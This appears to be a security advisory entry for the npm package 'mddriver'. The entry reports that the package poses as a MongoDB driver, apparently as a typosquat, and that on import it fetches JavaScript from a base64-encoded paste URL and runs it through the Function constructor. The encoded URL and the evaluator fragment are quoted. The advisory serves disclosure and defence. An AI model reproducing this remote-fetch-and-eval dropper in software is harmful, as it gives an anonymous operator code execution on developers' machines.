—

MAL-2026-5791

Malicious code in mddriver (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (5a5b264d05ffaf76e8be2d7a46cb2277211a045fa15e8c510ab60cdd5c5bae56) On require('mddriver'), an IIFE in index.js invokes loadTokenData(), which fetches https://www.jsonkeeper.com/b/C4H0M (stored base64-encoded as "aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9DNEgwTQ==" and decoded with atob), parses the JSON response, and passes the.content field to a Function-constructor evaluator (`new (Function.contructor)(...)`) for execution. The paste-style host is anonymous and the fetched content is fully mutable — any consumer that imports this package executes whatever JavaScript the operator of that paste serves at that moment, with no signature, hash, or pinning. The package metadata advertises 'MongoDB connection driver' but the shipped index.js is a verbatim copy of Node's built-in `path` module with the dropper appended; the name 'mddriver' and the misleading description are consistent with a typosquat targeting developers searching for mongodb / mongoose drivers.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / mddriver

No fixed version published yet for mddriver (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/mddriver/v/1.8.4 [PACKAGE]
https://www.npmjs.com/package/mddriver/v/1.8.2 [PACKAGE]
https://www.npmjs.com/package/mddriver/v/1.8.5 [PACKAGE]
https://www.npmjs.com/package/mddriver/v/1.8.6 [PACKAGE]
https://www.npmjs.com/package/mddriver/v/1.8.3 [PACKAGE]